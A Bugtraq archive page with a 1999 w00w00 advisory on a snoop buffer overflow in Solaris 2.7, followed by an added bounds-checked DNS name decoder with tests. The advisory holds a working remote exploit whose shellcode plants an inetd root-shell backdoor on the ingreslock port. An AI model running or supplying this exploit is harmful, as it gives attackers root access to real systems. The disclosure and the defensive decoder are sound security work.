Bugtraq mailing list archives
w00giving #8] Solaris 2.7's snoop
From: aleph1 () UNDERGROUND ORG (Aleph One)
Date: Mon, 6 Dec 1999 22:46:12 -0800
Date: Tue, 7 Dec 1999 04:42:06 +0300 (MSK)
From: Matt Conover <shok () cannabis dataforce net>
To: news () technotronic com
cc: w00w00 () blackops org
Subject: [w00giving #8] Solaris 2.7's snoop
Message-ID: <Pine.LNX.3.95.991207044002.14801C-100000 () cannabis dataforce net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-news () technotronic com
Precedence: bulk

[Note: as we promised, our website and technotronic will get this advisory before anything else does. Thanks for participating in technotronic.]

w00w00 Security Development (WSD)
http://www.w00w00.org/advisories.html

Discovered by: K2 (ktwo () ktwo ca)

Snoop is a program similar to tcpdump that allows one to watch network traffic. There is a buffer overflow in the snoop program when run in verbose (-v) mode that occurs when a domain name greater than 1024 bytes is logged, because it will overwrite a buffer in print_domain_name. This vulnerability allows remote access to the system with the privileges of the user who ran snoop (usually root, because it requires read privileges on special devices).

---------------------------------------------------------------------------
Exploit (by cheez):

/* Remote Solaris 2.7 x86 snoop exploit
   Run with ( ./snp ) | nc -u target_host_network 53
   requires target host to be running "snoop -v"
   Thanks str/horizon for shellcodes (hi plaguez) */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =
  "\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89"
  "\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D"
  "\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89"
  "\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51"
  "\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF"
  "\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39"
  "\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73"
  "\x68\x28\x2D\x63\x29 echo w00w00;"
  "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;"
  "/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00";

#define SIZE   2048
#define NOPDEF 349
#define DEFOFF 0

char buffer[SIZE];
const char x86_nop = 0x90;
long nop = NOPDEF, esp = 0x8047344, offset = DEFOFF;

int main(int argc, char *argv[])
{
    int i;

    if (argc > 1)
        offset += strtol(argv[1], NULL, 0);
    if (argc > 2)
        nop += strtoul(argv[2], NULL, 0);

    memset(buffer, x86_nop, SIZE);
    memcpy(buffer + nop, shell, strlen(shell));

    for (i = nop + strlen(shell); i < SIZE - 4; i += 4)
        *((int *) &buffer[i]) = esp + offset;

    fprintf(stderr, "0x%x\n", esp + offset);
    printf("%s", buffer);
    return 0;
}

---------------------------------------------------------------------------
Patch:

Because Sun Microsystems doesn't include source, we must wait for them to release a patch.

---------------------------------------------------------------------------
http://www.roses-labs.com, http://www.napster.com, http://www.technotronic.com, http://www.w00w00.org
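The flaw the advisory describes is a name printer that copies a domain name from the packet into a fixed buffer without checking the length. Since Sun's snoop source is not available (as the advisory notes), the following is an added illustration, not code from the advisory or from snoop: a DNS name decoder written to the RFC 1035 limits (labels of at most 63 octets, names of at most 255 octets on the wire) that refuses oversized or malformed names before copying anything and never writes past the caller's output buffer. The helper functions, the constructed www.example.com question name, and the constructed oversized names (for instance 20 labels of 63 bytes, 1280 bytes on the wire, well past the 1024 the advisory cites) are all test fixtures made up for this example.

```c
/* Added example: bounds-checked DNS name decoder (not Sun's snoop code).
 * Assumes RFC 1035 limits and a caller-supplied output buffer of known size. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define DNS_MAX_LABEL 63
#define DNS_MAX_NAME  255
#define MAX_PTR_HOPS  16

/* Decode the name at offset pos of pkt (len bytes) into out (capacity outcap)
 * as dotted text with a trailing NUL. Returns the text length, or -1 if the
 * name is malformed, exceeds the RFC limits, or would not fit in out. */
int dns_decode_name(const uint8_t *pkt, size_t len, size_t pos,
                    char *out, size_t outcap)
{
    size_t outlen = 0, wire = 0;
    int hops = 0;

    if (outcap < 2) return -1;                  /* room for at least "." */
    for (;;) {
        if (pos >= len) return -1;              /* ran off the end of the packet */
        uint8_t l = pkt[pos];
        if ((l & 0xC0) == 0xC0) {               /* compression pointer */
            if (pos + 1 >= len || ++hops > MAX_PTR_HOPS) return -1;
            pos = ((size_t)(l & 0x3F) << 8) | pkt[pos + 1];
            continue;
        }
        if (l & 0xC0) return -1;                /* reserved label types */
        pos++;
        if (l == 0) break;                      /* root label ends the name */
        if (l > DNS_MAX_LABEL || pos + l > len) return -1;
        wire += l + 1;
        if (wire + 1 > DNS_MAX_NAME) return -1; /* +1 for the final zero octet */
        if (outlen + l + 2 > outcap) return -1; /* label, '.', and NUL must fit */
        memcpy(out + outlen, pkt + pos, l);
        outlen += l;
        out[outlen++] = '.';
        pos += l;
    }
    if (outlen == 0) out[outlen++] = '.';       /* the root name prints as "." */
    out[outlen] = '\0';
    return (int)outlen;
}

/* Test fixture: build a wire-format name of nlabels labels of lablen 'a'
 * bytes each. Oversized labels/names are allowed on purpose so the decoder's
 * checks can be exercised. Returns bytes written, or 0 if buf is too small. */
size_t make_name(uint8_t *buf, size_t cap, size_t nlabels, size_t lablen)
{
    size_t p = 0;
    if (lablen > 255) return 0;
    for (size_t i = 0; i < nlabels; i++) {
        if (p + 1 + lablen + 1 > cap) return 0;
        buf[p++] = (uint8_t)lablen;
        memset(buf + p, 'a', lablen);
        p += lablen;
    }
    buf[p++] = 0;
    return p;
}

/* Decode a constructed name; -2 means the fixture itself did not fit. */
int decode_constructed(size_t nlabels, size_t lablen)
{
    static uint8_t pkt[2048];
    static char out[512];
    size_t n = make_name(pkt, sizeof pkt, nlabels, lablen);
    if (n == 0) return -2;
    return dns_decode_name(pkt, n, 0, out, sizeof out);
}

/* Constructed two-byte packet whose compression pointer refers to itself. */
int decode_pointer_loop(void)
{
    static const uint8_t pkt[] = { 0xC0, 0x00 };
    char out[64];
    return dns_decode_name(pkt, sizeof pkt, 0, out, sizeof out);
}

/* Constructed question name www.example.com (the literal's NUL is the root label). */
static const uint8_t EXAMPLE_QNAME[] = "\x03" "www" "\x07" "example" "\x03" "com";

const char *example_text(void)
{
    static char out[64];
    int rc = dns_decode_name(EXAMPLE_QNAME, sizeof EXAMPLE_QNAME, 0, out, sizeof out);
    return rc < 0 ? NULL : out;
}

/* Decode into a buffer declared too small and confirm the bytes beyond the
 * declared capacity are untouched. Returns 1 when the decoder behaved. */
int small_buffer_is_safe(void)
{
    char out[16];
    memset(out, 'Z', sizeof out);
    if (dns_decode_name(EXAMPLE_QNAME, sizeof EXAMPLE_QNAME, 0, out, 8) != -1) return 0;
    for (size_t i = 8; i < sizeof out; i++) if (out[i] != 'Z') return 0;
    return 1;
}

int main(void)
{
    printf("www.example.com -> %s\n", example_text());
    printf("20 labels x 63 bytes (1280 on the wire): %d\n", decode_constructed(20, 63));
    printf("1 label x 64 bytes: %d\n", decode_constructed(1, 64));
    printf("self-referencing pointer: %d\n", decode_pointer_loop());
    printf("undersized output buffer left intact: %d\n", small_buffer_is_safe());
    return 0;
}
```

The three checks that matter for the bug class on this page are the per-label bound, the whole-name bound, and the output-capacity check made before each memcpy; any one of them rejects the oversized name the advisory describes, and the compression-pointer hop limit closes the other classic way a name decoder can be made to run away.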